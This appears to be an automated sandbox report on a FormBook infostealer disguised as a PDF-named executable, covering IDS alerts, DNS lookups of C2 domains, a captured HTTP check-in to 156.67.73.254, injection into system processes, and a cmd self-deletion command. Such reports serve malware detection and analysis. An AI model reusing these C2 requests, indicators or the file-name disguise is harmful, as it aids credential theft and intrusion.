LoadImageW, GetClassNameW
                                                                                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-11-26T11:17:18.647765+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449909156.67.73.25480TCP
                                                                                                                    2024-11-26T11:17:18.647765+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449909156.67.73.25480TCP
                                                                                                                    2024-11-26T11:17:18.647765+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449909156.67.73.25480TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 26, 2024 11:17:17.500309944 CET4990980192.168.2.4156.67.73.254
                                                                                                                    Nov 26, 2024 11:17:17.620445967 CET8049909156.67.73.254192.168.2.4
                                                                                                                    Nov 26, 2024 11:17:17.620521069 CET4990980192.168.2.4156.67.73.254
                                                                                                                    Nov 26, 2024 11:17:17.620672941 CET4990980192.168.2.4156.67.73.254
                                                                                                                    Nov 26, 2024 11:17:17.740788937 CET8049909156.67.73.254192.168.2.4
                                                                                                                    Nov 26, 2024 11:17:18.136533022 CET4990980192.168.2.4156.67.73.254
                                                                                                                    Nov 26, 2024 11:17:18.297616959 CET8049909156.67.73.254192.168.2.4
                                                                                                                    Nov 26, 2024 11:17:18.646579027 CET8049909156.67.73.254192.168.2.4
                                                                                                                    Nov 26, 2024 11:17:18.647764921 CET4990980192.168.2.4156.67.73.254

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 26, 2024 11:15:35.403584003 CET6550953192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:15:35.825655937 CET53655091.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:15:53.964972019 CET4996153192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:15:54.329902887 CET53499611.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:16:14.435009956 CET5322153192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:16:14.665364981 CET53532211.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:16:35.129565001 CET6085653192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:16:35.537247896 CET53608561.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:16:56.262780905 CET5491153192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:16:56.466669083 CET53549111.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:17:16.927644968 CET6180853192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:17:17.494760036 CET53618081.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:17:37.594098091 CET5553953192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:17:37.833132029 CET53555391.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:17:58.218943119 CET5918353192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:17:58.450767994 CET53591831.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:18:19.291780949 CET6422753192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:18:19.509422064 CET53642271.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:18:40.372323036 CET5003353192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:18:40.593161106 CET53500331.1.1.1192.168.2.4
                                                                                                                    Nov 26, 2024 11:19:01.361736059 CET6406353192.168.2.41.1.1.1
                                                                                                                    Nov 26, 2024 11:19:01.730392933 CET53640631.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 26, 2024 11:15:35.403584003 CET192.168.2.41.1.1.10xb4a1Standard query (0)www.iddyspiderish.lifeA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:15:53.964972019 CET192.168.2.41.1.1.10x36e8Standard query (0)www.fricaduka.storeA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:16:14.435009956 CET192.168.2.41.1.1.10xa8c7Standard query (0)www.iralcity.storeA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:16:35.129565001 CET192.168.2.41.1.1.10xb31Standard query (0)www.itchen-design-87997.bondA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:16:56.262780905 CET192.168.2.41.1.1.10xf14dStandard query (0)www.hetangosalon.netA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:17:16.927644968 CET192.168.2.41.1.1.10x6423Standard query (0)www.loverhoodie.shopA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:17:37.594098091 CET192.168.2.41.1.1.10xa47dStandard query (0)www.vjoami3.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:17:58.218943119 CET192.168.2.41.1.1.10x5c9eStandard query (0)www.ryptocurrency-22237.bondA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:18:19.291780949 CET192.168.2.41.1.1.10xaf5dStandard query (0)www.iaokoa.netA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:18:40.372323036 CET192.168.2.41.1.1.10x3e73Standard query (0)www.odgerlazerhats.netA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:19:01.361736059 CET192.168.2.41.1.1.10xaa2eStandard query (0)www.olconsulting.xyzA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 26, 2024 11:15:35.825655937 CET1.1.1.1192.168.2.40xb4a1Name error (3)www.iddyspiderish.lifenonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:15:54.329902887 CET1.1.1.1192.168.2.40x36e8Name error (3)www.fricaduka.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:16:14.665364981 CET1.1.1.1192.168.2.40xa8c7Name error (3)www.iralcity.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:16:35.537247896 CET1.1.1.1192.168.2.40xb31Name error (3)www.itchen-design-87997.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:16:56.466669083 CET1.1.1.1192.168.2.40xf14dName error (3)www.hetangosalon.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:17:17.494760036 CET1.1.1.1192.168.2.40x6423No error (0)www.loverhoodie.shoploverhoodie.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:17:17.494760036 CET1.1.1.1192.168.2.40x6423No error (0)loverhoodie.shop156.67.73.254A (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:17:37.833132029 CET1.1.1.1192.168.2.40xa47dName error (3)www.vjoami3.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:17:58.450767994 CET1.1.1.1192.168.2.40x5c9eName error (3)www.ryptocurrency-22237.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:18:19.509422064 CET1.1.1.1192.168.2.40xaf5dName error (3)www.iaokoa.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:18:40.593161106 CET1.1.1.1192.168.2.40x3e73Name error (3)www.odgerlazerhats.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 26, 2024 11:19:01.730392933 CET1.1.1.1192.168.2.40xaa2eName error (3)www.olconsulting.xyznonenoneA (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.loverhoodie.shop

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449909156.67.73.254802580C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 26, 2024 11:17:17.620672941 CET167OUTGET /ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL HTTP/1.1
                                                                                                                    Host: www.loverhoodie.shop
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:05:14:56
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
                                                                                                                    Imagebase:0x750000
                                                                                                                    File size:1'086'464 bytes
                                                                                                                    MD5 hash:A03815195E40A8CAF9E0DA80ECCB9240
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:05:14:57
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
                                                                                                                    Imagebase:0x970000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:05:14:58
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.4140991356.000000000E62C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:05:15:00
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                                                                                                    Imagebase:0xc20000
                                                                                                                    File size:61'440 bytes
                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:05:15:04
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                                    Imagebase:0x240000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:05:15:04
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                      Signature Coverage:6.9%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:175
                                                                                                                      execution_graph 97317 751055 97322 752649 97317->97322 97332 7577c7 97322->97332 97327 752754 97328 75105a 97327->97328 97340 753416 59 API calls 2 library calls 97327->97340 97329 772f80 97328->97329 97386 772e84 97329->97386 97331 751064 97341 770ff6 97332->97341 97334 7577e8 97335 770ff6 Mailbox 59 API calls 97334->97335 97336 7526b7 97335->97336 97337 753582 97336->97337 97379 7535b0 97337->97379 97340->97327 97343 770ffe 97341->97343 97344 771018 97343->97344 97346 77101c std::exception::exception 97343->97346 97351 77594c 97343->97351 97368 7735e1 DecodePointer 97343->97368 97344->97334 97369 7787db RaiseException 97346->97369 97348 771046 97370 778711 58 API calls _free 97348->97370 97350 771058 97350->97334 97352 7759c7 97351->97352 97361 775958 97351->97361 97377 7735e1 DecodePointer 97352->97377 97354 775963 97354->97361 97371 77a3ab 58 API calls 2 library calls 97354->97371 97372 77a408 58 API calls 7 library calls 97354->97372 97373 7732df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97354->97373 97355 7759cd 97378 778d68 58 API calls __getptd_noexit 97355->97378 97358 77598b RtlAllocateHeap 97359 7759bf 97358->97359 97358->97361 97359->97343 97361->97354 97361->97358 97362 7759b3 97361->97362 97366 7759b1 97361->97366 97374 7735e1 DecodePointer 97361->97374 97375 778d68 58 API calls __getptd_noexit 97362->97375 97376 778d68 58 API calls __getptd_noexit 97366->97376 97368->97343 97369->97348 97370->97350 97371->97354 97372->97354 97374->97361 97375->97366 97376->97359 97377->97355 97378->97359 97380 7535bd 97379->97380 97381 7535a1 97379->97381 97380->97381 97382 7535c4 RegOpenKeyExW 97380->97382 97381->97327 97382->97381 97383 7535de RegQueryValueExW 97382->97383 97384 753614 RegCloseKey 97383->97384 97385 7535ff 97383->97385 97384->97381 97385->97384 97387 772e90 __alloc_osfhnd 97386->97387 97394 773457 97387->97394 97393 772eb7 __alloc_osfhnd 97393->97331 97411 779e4b 97394->97411 97396 772e99 97397 772ec8 DecodePointer DecodePointer 97396->97397 97398 772ea5 97397->97398 97399 772ef5 97397->97399 97408 772ec2 97398->97408 97399->97398 97457 7789e4 59 API calls __fclose_nolock 97399->97457 97401 772f58 EncodePointer EncodePointer 97401->97398 97402 772f07 97402->97401 97403 772f2c 97402->97403 97458 778aa4 61 API calls 2 library calls 97402->97458 97403->97398 97406 772f46 EncodePointer 97403->97406 97459 778aa4 61 API calls 2 library calls 97403->97459 97406->97401 97407 772f40 97407->97398 97407->97406 97460 773460 97408->97460 97412 779e6f EnterCriticalSection 97411->97412 97413 779e5c 97411->97413 97412->97396 97418 779ed3 97413->97418 97415 779e62 97415->97412 97442 7732f5 58 API calls 3 library calls 97415->97442 97419 779edf __alloc_osfhnd 97418->97419 97420 779f00 97419->97420 97421 779ee8 97419->97421 97434 779f21 __alloc_osfhnd 97420->97434 97446 778a5d 58 API calls 2 library calls 97420->97446 97443 77a3ab 58 API calls 2 library calls 97421->97443 97424 779eed 97444 77a408 58 API calls 7 library calls 97424->97444 97425 779f15 97428 779f1c 97425->97428 97429 779f2b 97425->97429 97427 779ef4 97445 7732df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97427->97445 97447 778d68 58 API calls __getptd_noexit 97428->97447 97432 779e4b __lock 58 API calls 97429->97432 97435 779f32 97432->97435 97434->97415 97436 779f57 97435->97436 97437 779f3f 97435->97437 97449 772f95 97436->97449 97448 77a06b InitializeCriticalSectionAndSpinCount 97437->97448 97440 779f4b 97455 779f73 LeaveCriticalSection _doexit 97440->97455 97443->97424 97444->97427 97446->97425 97447->97434 97448->97440 97450 772f9e RtlFreeHeap 97449->97450 97454 772fc7 __dosmaperr 97449->97454 97451 772fb3 97450->97451 97450->97454 97456 778d68 58 API calls __getptd_noexit 97451->97456 97453 772fb9 GetLastError 97453->97454 97454->97440 97455->97434 97456->97453 97457->97402 97458->97403 97459->97407 97463 779fb5 LeaveCriticalSection 97460->97463 97462 772ec7 97462->97393 97463->97462 97464 751066 97469 75f8cf 97464->97469 97466 75106c 97467 772f80 __cinit 67 API calls 97466->97467 97468 751076 97467->97468 97470 75f8f0 97469->97470 97502 770143 97470->97502 97474 75f937 97475 7577c7 59 API calls 97474->97475 97476 75f941 97475->97476 97477 7577c7 59 API calls 97476->97477 97478 75f94b 97477->97478 97479 7577c7 59 API calls 97478->97479 97480 75f955 97479->97480 97481 7577c7 59 API calls 97480->97481 97482 75f993 97481->97482 97483 7577c7 59 API calls 97482->97483 97484 75fa5e 97483->97484 97512 7660e7 97484->97512 97488 75fa90 97489 7577c7 59 API calls 97488->97489 97490 75fa9a 97489->97490 97540 76ffde 97490->97540 97492 75fae1 97493 75faf1 GetStdHandle 97492->97493 97494 75fb3d 97493->97494 97495 7949d5 97493->97495 97496 75fb45 OleInitialize 97494->97496 97495->97494 97497 7949de 97495->97497 97496->97466 97547 7b6dda 64 API calls Mailbox 97497->97547 97499 7949e5 97548 7b74a9 CreateThread 97499->97548 97501 7949f1 CloseHandle 97501->97496 97549 77021c 97502->97549 97505 77021c 59 API calls 97506 770185 97505->97506 97507 7577c7 59 API calls 97506->97507 97508 770191 97507->97508 97556 757d2c 97508->97556 97510 75f8f6 97511 7703a2 6 API calls 97510->97511 97511->97474 97513 7577c7 59 API calls 97512->97513 97514 7660f7 97513->97514 97515 7577c7 59 API calls 97514->97515 97516 7660ff 97515->97516 97577 765bfd 97516->97577 97519 765bfd 59 API calls 97520 76610f 97519->97520 97521 7577c7 59 API calls 97520->97521 97522 76611a 97521->97522 97523 770ff6 Mailbox 59 API calls 97522->97523 97524 75fa68 97523->97524 97525 766259 97524->97525 97526 766267 97525->97526 97527 7577c7 59 API calls 97526->97527 97528 766272 97527->97528 97529 7577c7 59 API calls 97528->97529 97530 76627d 97529->97530 97531 7577c7 59 API calls 97530->97531 97532 766288 97531->97532 97533 7577c7 59 API calls 97532->97533 97534 766293 97533->97534 97535 765bfd 59 API calls 97534->97535 97536 76629e 97535->97536 97537 770ff6 Mailbox 59 API calls 97536->97537 97538 7662a5 RegisterWindowMessageW 97537->97538 97538->97488 97541 76ffee 97540->97541 97542 7a5cc3 97540->97542 97544 770ff6 Mailbox 59 API calls 97541->97544 97580 7b9d71 60 API calls 97542->97580 97546 76fff6 97544->97546 97545 7a5cce 97546->97492 97547->97499 97548->97501 97581 7b748f 65 API calls 97548->97581 97550 7577c7 59 API calls 97549->97550 97551 770227 97550->97551 97552 7577c7 59 API calls 97551->97552 97553 77022f 97552->97553 97554 7577c7 59 API calls 97553->97554 97555 77017b 97554->97555 97555->97505 97557 757da5 97556->97557 97558 757d38 __wsetenvp 97556->97558 97569 